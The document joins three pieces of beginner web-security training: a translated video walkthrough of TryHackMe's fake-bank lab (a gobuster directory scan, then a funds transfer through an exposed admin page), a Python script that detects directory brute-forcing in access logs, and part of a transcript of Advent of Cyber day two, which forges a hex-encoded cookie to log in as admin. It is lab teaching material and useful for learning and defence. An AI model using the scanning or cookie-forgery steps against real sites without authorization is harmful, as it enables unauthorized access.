Um, a hacker's first website, right? The first website you hack into. Then it also gives a rough introduction to what an offensive penetration testing engineer is, and how to get your first... how to break into your first machine. Very, very simple, but very interesting. OK, no more chit-chat, let's get started, right? If your English isn't great, we can switch to Chinese, right? Use Google Chrome to translate it. Uh, that also works very nicely. What I recommended to my students before was Yuque. No no no, for note-taking I recommended Yuque, right? Of course that's just what I find handy; it doesn't prove it's great. What I recommend to everyone is Caiyun Xiaoyi: if you have trouble reading English, you can install that plugin, which shows Chinese and English side by side, which is quite nice.

OK, enough talk. First, right: Introduction to Offensive Security, hack your first website in a safe and legal environment and experience the work of an ethical hacker. This has to be emphasized, right? Whatever kind of testing you do, it has to be within the law. Uh, many people who come to me to learn, I tell them to first go buy a copy of the Cybersecurity Law and read it, because it really is very important. Many people, hey, they learned a little, but don't really understand, right? Anyway, once they can use some basic tools they go out and, right, go all in, and end up putting themselves inside. There are many people like that. So we must stay within a safe and legal scope, right? No more on that.

What is offensive security? In short, offensive security is the process of breaking into computer systems, exploiting software bugs and finding application... gaining unauthorized access through vulnerabilities. To beat a hacker, you need to act like a hacker, finding vulnerabilities and patching them before cybercriminals do, just as you will do in this room. Below, uh. On the other hand there's defensive security; sorry, strategically ignoring the blue team, right, that's our red team's lot. There's also defensive security, which is the process of protecting an organization's network and computer systems by analyzing and securing against any potential digital threats. Learn more in the digital forensics room. The blue team is more about tracing and forensics. Later we'll also cover some labs and techniques to take you through it. In a defensive cyber role, you may investigate infected computers or devices to understand how they were hacked, track cybercriminals, or monitor infrastructure for malicious activity. That's also what a lot of SOCs do, right? Maybe looking at the back end for IPs that are attacking and then banning that IP.

Which of the following options better represents the process of simulating a hacker's actions to find system vulnerabilities: offensive security or defensive security? That's easy, definitely offensive security. Let me also share a small trick for answering these questions: sometimes the number of letters gives you a hint, right? Because, uh, after all we're not native speakers, right, and when you have trouble reading, you can guess from the count and match it up, and sometimes you find the answer. Don't get too hung up on this; we're mainly learning the operations and the broad approach of the process.

Before getting into cybersecurity careers and what offensive security is, let's first introduce hacking. Yes, it's legal; all exercises are simulations, as we've stressed many times. So how does the first cyber attack attack? We start the machine directly. The whole simulation explains a lot; what exactly does it say? It simulates a website, uh, and it's very deliberate even in the naming, right? Fake Bank, a fake bank website. But if we, um, follow the relevant news, you'll find that every year there are really many banks hit by ransomware attacks; it's just that some of them aren't reported, some are reported, and some paid the ransom and got unlocked, right?

So, um, these commands and operations may look very simple, but that's roughly the hacker's way of thinking, right? Get in through one of your vulnerabilities, gain some privileges, then you can modify account targets, transfer your money away directly, or do some extortion, right? Once such harm occurs, the overall damage is very large. So how exactly does a hacker attack? We can start this machine. Uh, TryHackMe supports two forms of learning. The first is the AttackBox; you can see on my right I've opened the AttackBox directly. It comes with a built-in Kali environment; you can open it and connect, very simple. But often this AttackBox isn't very stable. You can see it opened fakebank.com directly. If it's unstable at that point, what do we do? There's "Access"; here it's translated as "usage rights", right? Actually it's Access, the way in. Inside there's an .ovpn OpenVPN file; download it to your local Kali machine and run it. When we get to some harder or more complex labs later, we'll cover how to configure that file; it's also very simple. Then once connected, right, you can do things in your own Kali machine. Your own Kali machine has your own tools or some handy scripts, and you can use them yourself. OK. Of course, right now when we don't need complex operations, just use the, uh, AttackBox it provides. Hey, did I just say "hacked books"? Whatever, it's the attack box anyway. The attack... attack box.

Um, open the terminal and we follow its steps one by one. You can see it gave us an IP address here. Um, this should be the machine's IP address, not our local IP address. If you're familiar with Linux basics, we can check the local IP address: ifconfig... sorry... "ifconfig: command not found, but can be installed with"... whoa, it seems it isn't installed. Forget it, we won't look, just go. First ping to see if it's reachable. After so much pinging there's a bit of a side effect. 209.83, OK, no problem. Of course, using its own ping to hit its own machine will naturally work.

Then directly gobuster -u, um, to do a simple scan, a simple test. Going forward when we encounter commands like this I'll quickly go over what each command actually does for everyone. Because, um, I originally planned to make subtitles and some explanatory articles afterwards, but I'm not very familiar with Premiere yet, so I'll definitely add that later. For more complex labs, including the specific commands, right, I'll type them quickly on screen and you can screenshot and study them. Uh, gobuster, right, is a directory scanning tool. For example our URL, right, has many directories, like blah blah blah, a whole bunch of directories, right. Normally, doing a black-box test, we definitely don't know what directories it has. We can use directory scanning tools like this. gobuster, dirsearch, these are the well-known foreign scanning tools. If you're in China you can also use something like Yujian to scan. OK, gobuster -u: -u is URL, the string of link after it is the URL, uh, http://fakebank.com, uh, our website link. Then -w is the wordlist used, wordlist.txt. So, a simple directory scan, a basic directory scan; we can just start scanning.

About these commands and tools, right? There will be detailed lessons later to explain them, right? At the beginning you just need to follow along and do it; you don't need to know every fundamental point and every detail beforehand, spending a lot of time on very simple content. That's the learning mode I don't recommend. Then just start. You can see the scan results: there's an images, and a bank-transfer, which seems to be a bank transfer page, right? Let's open bank-transfer. If you look carefully at the article on the left that gives you hints, you can see it very deliberately hid this directory. "Dir", uh, "directory name output", right? You must scan it yourself. This is also what I most recommend about TryHackMe, because it encourages you to practice and operate yourself, to learn how to use a tool or how to run a command, rather than simply, hey, copying an answer, submitting the answer and "I've finished this lab"; that's actually meaningless. OK, it also has a detailed explanation of each command here. -u is used to state the website we're scanning; -w the wordlist adopted. Why do we use wordlist.txt here? Because it provides this wordlist.txt itself, and it's on the desktop, right. So we can operate directly, very convenient; you don't need to make changes.

Then you can see there's an admin portal here; it seems it skipped the other steps, right? The complex middle process, how to get admin privileges, or how to do some transfers, all skipped to form a simple demonstration. We now effectively have administrator privileges, and we have the ability to transfer funds; that's very dangerous, right? You can see it says here to transfer $2000 from bank account 2276 to your account. My account number is 8881. Send from 2276, send to 8881. If you look carefully at the page we just logged into, the Fake Bank homepage, we're in debt, right? We're broke, right? Through this method, hey, not only do we pay off our debts, we even have some balance left, right? You can see this page, we're at -1232 dollars. Oh. You can look at the spending: fast food, McDonald's, 17 dollars. Apple, 1800 dollars, right? They really earn money... you guys spend hard. OK, transfer to our account, then "amount to send USD" is how much we transfer; the hint here is to transfer 2000 dollars, right? "Since morning"... OK, "success, transfer complete, you have successfully completed the transfer, here are the details of the transfer", so from the administrator's account, or whoever's account, 2000 dollars were transferred to our account. Then we go back to our page and refresh. "Oh, congratulations, you hacked the bank." It's that simple, right? You may think learning hacking must be very complicated, or have all kinds of inscrutable test pages. But really, stripped down to this step, you can see we took less than a few minutes to hack the bank, right? If you have some basics, you'll only be faster than me, not slower, right? Know what I mean? These small knowledge points about the profession, we'll do a detailed explanation later.

"Congratulations, you hacked the bank. The answer to the TryHackMe question is BankHacked." It's BankHacked. In your account balance you'll see a message; that is the answer to this question. Can you find the answer you need? It's BankHacked. I keep hearing it and I end up saying it too. If you are a penetration tester or security consultant, you can perform this exercise for companies to test their external applications for vulnerabilities. Find vulnerable pages, investigate vulnerabilities. Actually these simple tests you can do on, uh, for example a website you built yourself, or within a scope you're allowed to test, and run the gobuster command. Of course, it has to be within the allowed scope, with authorization obtained. Then do a test, take a look, hey, whether my own website has some obvious directory leaks, such as the admin admin or, uh, login page many people use, directly exposing my admin back end. Then this happens: people can easily do some testing and cause you some damage.

OK, click the red terminate button at the top of the page to terminate the machine. Form a good habit: start the machine, then shut down the machine, right, all within the appropriate scope. Because, uh, if you haven't paid for membership, there seems to be a time limit. If you go off to do something in the middle and forget to shut it down, it may waste a lot of time. Complete. Finally, there's an introduction to cybersecurity careers. People often wonder how others became hackers or defenders. The answer is simple: break it down. Learn the area of cybersecurity you're interested in and practice regularly. Build a habit of learning a little on TryHackMe every day, and you'll gain the knowledge needed to land your first job in the industry. So the accumulation of knowledge doesn't require you to spend, say, eight or ten hours at once, spending ten, seventeen, eighteen or twenty hours in a day, every day. You only need three to five hours a day, or even three to five hours is a bit much. Just stick to one to two hours, learn a little every day, right? The main thing is that consistency is very important. As long as you keep learning continuously, daily accumulation is actually, uh, more effective than a one-time investment of lots of time. Half an hour of study each day is more effective than ten hours in one day, right? That is, ah, if you do half an hour every day and stick to it for a long time. Not that you study only half an hour one day versus only ten hours one day, OK?

Then you can look here, there are three articles. Paul went from a construction worker to a cybersecurity engineer. Cassandra went from a music teacher to a security specialist. Brandyn used TryHackMe to find his first job while at school. You can take a look at the specific content; in the livestream I walked through them one by one, so here I won't go into detail. Um, lastly I have to say one more thing, right: don't, uh, think, hmm, "I'm not studying this as a major, right? I don't have the background; I'm just very interested in the hacker profession, or in the penetration testing engineer profession; should I study it?" Right? Don't get hung up on that; as long as you like it, as long as you're willing to put in the time, just go do it, right? Time will tell. That's also something I often say. If you're interested, take a look at these stories; they're quite inspiring, right? I had a student before who sold pigs, right? I'd tease him about it; I called him Brother Pig, right? Think about it, someone who sells pigs can learn and become a penetration testing engineer, so you definitely can too. So build confidence, right? Penetration testing isn't as hard as everyone thinks; just study well. OK, that's it! That's all for this lesson, see you next time, bye-bye. Don't forget to like and follow.
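The video runs gobuster against the lab site and then warns that an exposed admin or login directory on your own site can be found the same way. The defender's counterpart is to recognise that scan in the web server's access log. This is an added example, not code from the video or from TryHackMe; the log lines are constructed to mimic a gobuster-style run (hundreds of 404s from one client in seconds, followed by the hits), and the thresholds are illustrative assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/Nginx "combined" log format; only the fields this check needs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one client walking a wordlist (six misses in a few
# seconds, then two real paths found), plus one ordinary visitor.
SAMPLE_LOG = """\
10.10.14.5 - - [04/Aug/2023:10:15:01 +0000] "GET /.git HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:02 +0000] "GET /cgi-bin HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:02 +0000] "GET /images/ HTTP/1.1" 200 1043 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:03 +0000] "GET /test HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:03 +0000] "GET /old HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:04 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.1.0"
10.10.14.5 - - [04/Aug/2023:10:15:04 +0000] "GET /bank-transfer HTTP/1.1" 200 2210 "-" "gobuster/3.1.0"
203.0.113.7 - - [04/Aug/2023:10:16:40 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Aug/2023:10:16:41 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of ip/ts/method/path/status/ua, or None for lines we cannot parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def detect_dir_bruteforce(lines, min_404=5, window_seconds=60):
    """Flag a client IP when at least `min_404` responses were 404 within any
    `window_seconds` window. For each flagged client, report how many misses
    it produced and which non-404 paths it reached, i.e. what the scan found."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        misses = [r for r in recs if r["status"] == 404]
        # Sliding window over the timestamps of the 404 responses.
        flagged, j = False, 0
        for i in range(len(misses)):
            while (misses[i]["ts"] - misses[j]["ts"]).total_seconds() > window_seconds:
                j += 1
            if i - j + 1 >= min_404:
                flagged = True
                break
        if flagged:
            findings[ip] = {
                "misses": len(misses),
                "hits": sorted({r["path"] for r in recs if r["status"] != 404}),
                "user_agent": recs[0]["ua"],
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_dir_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The "hits" list is the part worth acting on: anything a scanner reached with a 200 is a directory the site exposes to unauthenticated clients, so review it for things like an unprotected admin area before someone else does.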

In this video we're gonna take on the TryHackMe Advent of Cyber 3, 2021 edition, day two, and without further ado, let's just kind of dive into it. You know, so, hey, I do have to apologize, guys. I'm sorry, I'm not in costume anymore. The vibe, the illusion, the artifice of Christmas spirit and holiday cheer is gone; it has abandoned us. But we at least still have some fun with the Advent of Cyber here at TryHackMe. So, hey, I'm over at tryhackme.com/christmas over on my screen here. If you scroll down, if you haven't already, you can join for free, join the room, AoC, and get ready to play. We got the ball rolling just yesterday for the TryHackMe Advent of Cyber, two, day two task, so only numbers at this point. Never mind, I'm not gonna say that, edit that part out. If you haven't seen the introductory video or the kickoff video that I helped kind of put together for this TryHackMe Advent of Cyber event, you can find that on my channel, and I hope you enjoy. Anyway, let's get to the good stuff. We just finished up the day one "Save the Gifts" activity, but now we're moving on to the day two "Elf HR Problems", and the story behind this: give me a little bit, I will read through the story and just cover all this high-level stuff. So if you're already a wizard, if you're already a guru, already know what we're talking about here, feel free to skip forward in the video. But if you are, hey, someone new getting started to feel out cybersecurity, let's, let's learn what we can learn together here. This is: McSkidy needs to check if any other employee elves have left or been affected by the Grinch Industries attack, but the systems that hold employee information have been hacked. Can you hack them back to determine if the other teams in the Best Festival Company have been affected? And here are the learning objectives: understanding the underlying technology of web servers and how the web communicates. We also have: understand what cookies are and their purpose; learn how to manipulate and manage cookies for malicious use.

We are gonna be doing some cookie stuff, we are gonna be doing some web, HTTP, kind of like, hey, internet, computers, networking right here, but it's gonna be a lot of fun. It says HTTP(S): for your computer and a web server to communicate with each other, an intermediary protocol is required. This is where HTTP, or the Hypertext Transfer Protocol, steps in. The HTTP protocol is a client-to-server protocol to provide communication between a client and a web server. Now, a web server is just another computer, just way out here in the back, that's still kind of saying, hey, I have information to give you, I have pages, I have results that you want to see, and I can hand them to you, you being the client. And you as the client, you just sort of... you're on the phone, right? You're calling up the web server and the web server answers and they say, hey, yep, I've got all the information that you need. That's the role between the client and server, kind of, what they do out there. When you as the client start to call them up on the phone, you make an HTTP request, and that request is crafted and it kind of has a couple of special properties, right? It has a method and a target. And now the method is what you want to do with this web server here: do you want to get information, or do you want to post something over there to the site? Those will always be included. The target header specifies what to retrieve from the server and the method specifies how. When retrieving information from a web server it's common to use the GET method, such as, like, hey, loading a picture, retrieving a picture. Literally, actually, take a look at this: when we were requesting this TryHackMe page right here, we had gotten this file included, this nice little Christmas star here, and we sent a GET request to retrieve that image file. So that's a good thing to know; it happens all the time and you'll be able to see it once we kind of get in the weeds here on what this challenge has us doing. When retrieving information it's common to use the GET method, such as loading a picture, and when you send data to a web server it's common to use a POST method, such as sending login information, like you trying to log in and authenticate to use this website, or you're uploading your profile picture or you're changing your profile description. That is all sent in a POST request, because you are giving the web server your information to now do new things with it. Once the server receives a request, it'll send back a response including any requested content, if successful, and a status code. The status code is to tell the client, you, me, us, how the web server interpreted the request. The most common successful code is HTTP 200, status OK. That's what you'll see if things went well, if you called them up, they answered the phone, and you were able to retrieve, GET, or actually set, POST, the information that you wanted to. So here's an example. You can see this is the raw HTTP protocol here, and take a look, this is... you can see that header just right there, and then, hey, maybe the server information, again who we're calling up on the phone when you make this request, how you want to receive it, and then down below here, I'll go ahead and change this to a different color so it's a little bit more readable. This is the content that you would retrieve as part of that request; that's the message, right, the raw data.

The protocol itself is only one small piece of the puzzle. Once content is retrieved from the web server, your browser needs a way to interpret and render the information sent. That's right, this is just structure, this is all the bones and the skeleton, like the blueprint that makes up the information that you might see from the web page, but it's not all the pretty pictures or the flashing colors and animations, right? Web applications are commonly formatted in HTML, the Hypertext Markup Language here, but it's rendered and styled in CSS, or the Cascading Style Sheets. JavaScript, another client-side language, actually client-side, doesn't it, it runs in your web browser, but dynamic, it's scripting and something that could be used to add dynamic functionality and cool features to a web page. In today's web environment, the use of web frameworks has significantly increased in popularity. Most modern web applications use many web frameworks and other web solutions that an end user doesn't even have to see or interact with. Now that could be Ruby on Rails, that could be Laravel, that could be Django, that could be Flask, that could be, I guess, Express, right, for the Node.js fanboys. For more information about HTTP request methods and headers, check out the Web Fundamentals room. Let's hop over there. Web Fundamentals is, you know, the TryHackMe room that you could explore and work through; it's super good. I want to go verify and check: it is a free room, so, hey, if you aren't subscribed to TryHackMe you could still jump in, play, and kind of get a good idea what's going on in that activity.

But now let's move on, now let's talk about something fun and something cool: cookies here. Cookies are how authentication really works. It's the bare bones, it is the vessel, it is literally the core and raw structure of how you can log in and the website knows that you're actually logged in and you are who you say you are. This is all because HTTP, right here, HTTP is a stateless protocol, and what that means is that it doesn't keep track of the previous communication that was done. You're calling up on the phone to your buddy; turns out your buddy has amnesia, he doesn't remember anything that you just said past what you just said, so you have to kind of have a secret message or something, part of and included in every single thing that you say, so it knows, oh, oh, oh, I'm talking to buddy or whatever. That's the use of cookies here. So when you send requests to a web server, the server cannot distinguish your requests from somebody else's. And let's imagine you're the omniscient server and you're getting phone calls from, like, everybody; phones are ringing off the hook. To solve the stateless problem and identify different users and access levels, the web server will assign cookies and create and manage a stateful session between the client and the server. Cookies are like tiny pieces of data or metadata, right, and information locally stored on your computer that are sent over to the server when you make a request. Again, so I was saying, hey, that's the kind of secret code: when you're calling up the server and you say, hey, 123792, this is John, and then it knows who you are and what you're doing, because you were able to authenticate and you passed it the cookie, a secret special token. The thing is, you don't want other folks to know what that cookie is. You don't want them to know your secret passcode; you don't want them to know that little token that could be used to say you are who you say you are. Cookies can be assigned any name and any value, allowing the web server to store any information that it wants. Today we'll be focusing on authentication cookies, also known as session cookies. Authentication or session cookies are used to identify you and what level of access you have for your session.

So here below is a diagram describing assigning and using a cookie, from the initial request to the session request. So this is going to be fun; I'm going to be able to draw all over this and kind of make a mess here. Check it out, here's the client over on the side. Let's see if my pen wants to work. Oof, oof, we did our best, guys. I don't know why Epic Pen always tends to lag over here, but of course you have your client, the web browser, on the left-hand side, and you already know, hey, this is our server here. Now as this happens, and it goes sequentially, right, you make one HTTP request. You can see this is a POST request right here; we go ahead and post, hey, I want to log in with this username and this password, and that works. Oh, man, can I actually draw better here? So the server goes on and says cool, cool, cool, cool, cool! I see who you are, I know who you are, now I'm gonna say, cool dude, set this cookie, so I actually have an understanding of who you are, and that way we know as we're talking to each other, here's the secret code, so that you can be who you want to be, Barbie girl. Now, now that this user is authenticated, they go do whatever they want to do on the actual application. We'll go and say, hey, I want to go make changes in the admin portal, so they'll send a GET request to go receive that page, and because it is including the cookie here... here, let's try a little picture, let's try a little... do I have a circle? Yeah, here's my cookie. It just looks like a donut, looks like a yellow donut; I don't have any good, like, cookie colors. And then the server comes back and he's like, sweet, man, I know who you are, I can see your cookie, you've got the secret passcode. Check it out, here's all the information that you wanted, because it was able to determine you are who you say you are based off of the cookie. And that's that explanation; hope that was fun. To begin the process, when you send a request such as a login request, your browser sends this information, blah, blah, blah; this is everything that I just discovered and talked about. There is one good thing here: it says when the server receives your GET request and cookie, it'll locate and sometimes deserialize your session. Deserialization is the process of taking data from a given format, like JSON, JSON, the JavaScript Object Notation, and then rebuilding it as a logical object or some kind of data format that a computer programming language, maybe PHP, maybe Python, maybe JavaScript, whatever, can actually read and interpret and understand. It's not just a flat, boring chunk of letters and numbers, right, because that's just a data representation; we want to bring it into a form that our programming language knows how to work with. If all of that succeeds, the web server goes ahead and responds, as it does over the phone, with a 200, A-OK, thumbs up, you're good, here's your stuff.

Now that we're seeing what cookies are and how they're used, let's dive into their contents. Ooh, okay, now I gotta be honest, I gotta be completely honest here: cookies are made up of over 11 different components. 11! And that's a lot, and some folks, maybe you're like, dude, I can count all those things on my hand, I have ten fingers, but I know that I need 11 because there are so many components in a cookie. Each component of the cookie, whether it's a name, value, domain, path, expires, size, secure, SameSite, etc., I would venture to say, unless you're doing some crazy hardcore witchcraft voodoo stuff, you don't need to know all of the ins and outs of the, you know, stuff beyond this. I'm saying, I'm saying I think really the name and the value are the most important pieces that you will mess with as you tinker with and explore cookies. All of this stuff, maybe, maybe, maybe sometimes you need to worry about it, not always. So if you are willing, if you don't mind, press the "I believe" button with me, and that way you don't have to overwhelm yourself in thinking, bro, I don't want to memorize and study and make flashcards for the 11 different components of cookies. I got to be honest, sometimes it's just the name and value that really mean the most here. But of course the domain is like, hey, where is it actually set, for a specific website; and the path, where is it okay to be used; when the cookie expires is just kind of an important thing; but the size, HttpOnly, some of these you might not always need to be in the weeds with. You should know that they exist, right, because they are settings and they are values for a specific cookie, but be that as it may, or whatever, whatever idiom you say to wrap up a thought that you don't know how to wrap up. Looking at all the components, a cookie may seem intimidating; there's no need to worry, as attackers... oh, TryHackMe just said this, TryHackMe taking the words right out of my mouth. Cookie components are always present in pairs. The main pair is that name and value, that's the most important part, right; it will define the name of the cookie and the value of the name. The second pair is the attribute-value pair; this defines an attribute of the cookie and the value of the attribute. That's actually setting it here, when you're using a Set-Cookie header in an HTTP request or response, right, from the web server. The web server, we saw that way back here, they were like, hey, we're setting a cookie with this web server response; all of that information that you just saw below is what's gonna be included in there, just here.

Now the thing is, cookies are stored locally, as in you carry them with you, right? You, you're the client, of course. So what if you could tamper with and change that cookie, and then when you give it back to the server, when you're calling the server up on the phone, you say, hey, remember how I used to be Billy Bob? Now I'm Joe Schmo, because I know the passcode 72918, and the server's like, cool dude. And that's the idea, that's how you can manipulate cookies and you could do specific stuff, you could get unintended behavior determined by the web developer. That's why you don't want to have your cookie shared, but if you are acting as the adversary, you know, you're putting your hacker hat on, you kind of want, maybe, to get access to someone else's cookies, because then you could access their session and access their pages on a web server. That's the idea, that's the gist there. Now you could do this in your web browser; like, you can just straight up do this in Firefox, Chrome, Edge, Internet Explorer, Safari, Opera, I don't know, I don't know what you're up to these days, Brave, is that what all the cool kids are using? Developer tools can be accessed by pressing F12 or Ctrl+Shift+I on your keyboard. In your web browser there is a little extra, extra fun feature called the developer tools, or sometimes the browser tools. These developer tools are open; to access your cookies, navigate to the Storage tab in Firefox or the Application tab in Chrome or Edge, select the Cookies dropdown on the left-hand side, and this is everything that you might be looking at when you're working on a page: Storage, Application, and the Cookies tab, we'll kind of set all that here for you. Cookie values might seem random at first; however, they often have an encoded value or meaning behind them that can be decoded to a non-arbitrary value, like a JavaScript object, like JSON, kind of as we were discussing before. From an attacker's perspective, you can decode the cookie value to identify the underlying objects. Once you've identified the underlying objects, you can modify them to whatever you want, like, again, hey, the account name that you're trying to log in with, Billy Bob, changed to Joe Schmo. Is there an isAdmin parameter, like a true or false, or a one or a zero, that says, hey, are you a superuser on this website? Totally change that. You can resend the cookie back, and if the web server interprets it, understands it, maybe you got access. Below is a summary of how cookie values can be manipulated: obtain a cookie value, like a regular normal one, when you're calling up the server on your phone, just registering and signing up for an account; if you decode that cookie value, identify the obvious notation of the structure of the cookie, and then change the parameters inside the object to a different parameter with a higher privilege level, like admin or administrator, right, kind of that idea I was just mentioning. Now, you re-encode the cookie back to what the server is expecting, because it needs to be able to know that this cookie hasn't been changed or tampered with; it wants to look as similar to a normal and regular cookie as it could. Like, I'll bring this back to the actual case of cookies: look, if you try to bring grandma chocolate chip cookies and all of a sudden you had oatmeal cookies given back to you, you're like, what the heck, this isn't, this isn't what I would have expected in this transaction here. They know something nefarious is going on, or they just can't handle it, maybe grandma's allergic to oatmeal cookies or something, I don't know. And then you do something with the cookie, you let it invoke itself, you let the server handle it and read it, oftentimes done by refreshing the page, because it forces the server, when you make another GET request, hey, can you tell me what's going on, to process and do all of it. If you want to learn more about all about that, there are some other rooms in TryHackMe: HTTP in Detail, or other authentication bypass challenges in different TryHackMe rooms. Let's go take a quick peek at some of those. This is the Web Fundamentals one; down below we have HTTP in Detail, and I'll scroll down to the very bottom, also again a free room, fantastic. Authentication Bypass, mmm, that's a subscriber one, okay, okay. So, hey, just know what you're getting into if you're tackling some of those other fun extracurricular TryHackMe rooms.

But now let's get on to the challenge, let's get on to our task here, what we are actually trying to accomplish. Let me go ahead and close out those other tabs, because I do want to be able to open up this new one here. It says open the static site in a new tab here. All right, so that's this link, go ahead and click on that, and this is the web page I am greeted with: the Best Festival monitoring, with some login or sign-up form, and I get some snowflakes falling. Could I turn the snowflakes off? No, it's just a facade, just a lie, just like me when I put on Santa's costume. So we open it up, we register an account and verify the cookies using the developer tools in your browser. All right, so, hey, let's go ahead and say john hammond, password pleasesubscribe... oh, and I need to actually sign up, right. Thank you, thank you, LastPass. Use that password manager, guys, please subscribe. And let's just say john at john.com, create account, here we go. Uh oh, so Google Chrome wants me to save this password, LastPass wants me to save this password. It says, hey, you don't have permission to register an account currently, please contact an administrator for more assistance. Did I get a cookie, though? So, if you wanted to, as TryHackMe mentioned, you can hit F12 on your keyboard or hit Ctrl+Shift+I on your keyboard, or you could very well right-click and do like an Inspect Element, and that will pop up the notion here of the developer tools. Now I'm going to go way, way over to the side here, because there is going to be something that we particularly want to see. Is this... this isn't... I want to verify what I just said was okay. Yeah, so this opens some other things when I hit Ctrl+Shift+I; when I hit F12 it's still the developer tools being opened. I am probably a dumbo and not seeing where Storage is, but I suppose it's under the Application tab, right? So if we go to Application and then we go to Cookies, can I expand this, and let's see, yeah, there is a static-labs.tryhackme.cloud entry there. Ooh, so this is the kind of connection that we have set up. We see a list of cookies with their name and value over here; one of these is for Font Awesome and the other, as you can see, for the domain here, is for static-labs.tryhackme.cloud. Now this value, you can see down below, my face is just about in the way, but it's a lot of letters and numbers. Seemingly these are more numbers than they are letters, and interestingly all the letters are a through f, which sounds a lot like hexadecimal. I don't know if TryHackMe's gonna maybe give us that clue, but we did see, hey, we found our cookie. It says, what is the name of the new cookie for your account? So that was user-auth, right, we were able to see that right over here, and now if we go back we can submit that, I'll hit enter. What encoding type was used for the cookie value? There is a hint here in case you didn't know, but I'm gonna take a guess that that is hexadecimal. Yeah, okay, cool. What would that hint have been if we wanted to click on that? Use CyberChef to decode the value. Ooh, okay, let me, let me fire up a CyberChef link. There we go.

If you wanted to, if you just genuinely had no idea what the heck we were looking at, I'll copy this cookie right here, right-click, select it all and copy, and bring it into CyberChef. If folks aren't familiar with CyberChef, CyberChef is an incredible tool to be able to do different things with data represented in different ways, and you can stack a lot of different operations, whatever you want it to be, then you can clear this out or manipulate them or move them around and see the input and output, like, rapidly. So that's a ton of cool stuff that you can do with this; CyberChef is super duper handy. It's all online, totally free, so, hey, if you want to, you can explore different recipes and see what the output is. Basically, "To" is like doing the operation in one direction, "From" is doing the operation in the other direction, so like encoding versus decoding. If we wanted to decode this cookie, it says, hey, we could convert a hexadecimal byte string back into its raw value. They give an example here, all these, and let's take that. Here we go. The hexadecimal representation is just a number system, right? It's base 16 rather than base 10, like we normally count in and use in our language, which is base, base ten, right, zero to nine. This time it's zero to nine with an a through f in hexadecimal, just like you saw up here in the input. There we go, we have company: The Best Festival, isregistered equals true, username is john hammond. So that's it, this looks like the same representation that we saw above, and this, as TryHackMe had mentioned, the structure with the curly braces kind of wrapping around it. Let's see, they had another example here, JSON, right, this is that structure, and I'll zoom in just a tad on that to focus on that. When you see the curly braces and when you see kind of a key-value being set with the colon to another actual value, age, colon, 50, eyeColor, colon, blue, whatever that structure is, it's JSON. Each of these is actually kind of represented and separated by a comma here; you can see that after each entry. But that is just a method, in its way, to store data. It doesn't actually mean anything, it's not code, you can't execute it, it's not gonna run, you're not compiling or running any JSON, but it's a representation to show data and information, and that's why they literally call it the object notation, because it's the notation, it's how it's presented and how it's stored. So that's JSON, JavaScript Object Notation.

We could manipulate the cookie and try and bypass the login portal. What's the value of the administrator cookie if we try to change our username to admin? So let's go back to CyberChef and do that. Let's say our username... if we kind of took this output here down below, I'm actually gonna do something weird, I'm gonna remove everything from input and clear out my CyberChef operations, and I'm gonna paste it in here so that now we could modify and tinker with what we actually want to change here and manipulate this cookie. Let's change that username to admin, typing that in, and let's change this to hexadecimal. Now you can see this could take a delimiter here; you could click on this and change it, because this is full of spaces. We don't want any spaces, so let's change that delimiter to None, and now I have this big long string here. Double-click in, right-click and copy, and paste it in, and let's go give this back to TryHackMe. Here's the value, hit submit, and that's correct. Now let's go back to our cookie editor here in our developer tools on the static website, and let's try to right-click a cookie and edit that name or edit that value here. So I could slap this in, replace it, just like that, and we could see that that was able to be changed and manipulated down below. Now if I were to refresh the page, you could click on the refresh button in your web browser or you could hit F5 or whatever; I really, really recommend, almost everyone, when you're trying to refresh a web page, hit Ctrl+Shift+R. That makes, like, a hard refresh without caching any information in the background, so any pages that you previously requested and your web browser knows, hey, I don't need to request those again because I already requested them: no, no, no, it tells your web browser, look, I'm gonna request everything no matter whether or not I've seen it before, and that will kind of give everything a clean slate. So if you've done any manipulating, like changing or tampering with your cookie, Ctrl+Shift+R pulls it all back down fresh. Let's do that on the keyboard real quick. Ooh, did I miss, did I make a mistake? Very, very likely. Let's check out my user-auth. Okay, no, it is the correct thing, but I don't know if I've actually told the server, hey, I want to set that cookie. Let's go verify that one more time. We've made this cookie; if I wanted to go back to the homepage... oh, yeah, this is trying to do some, like, GET request. I want to go back to the actual homepage. There we go, okay. So, that was just kind of an idiosyncrasy at the very, very top of the web page. I may have changed the value for the cookie, but it was still taking me to a page that wasn't trying to log in or get me anywhere; it was already telling me, hey, you can't log in, because it saw in the URL, from those GET parameter values, hey, you are not allowed to log in.

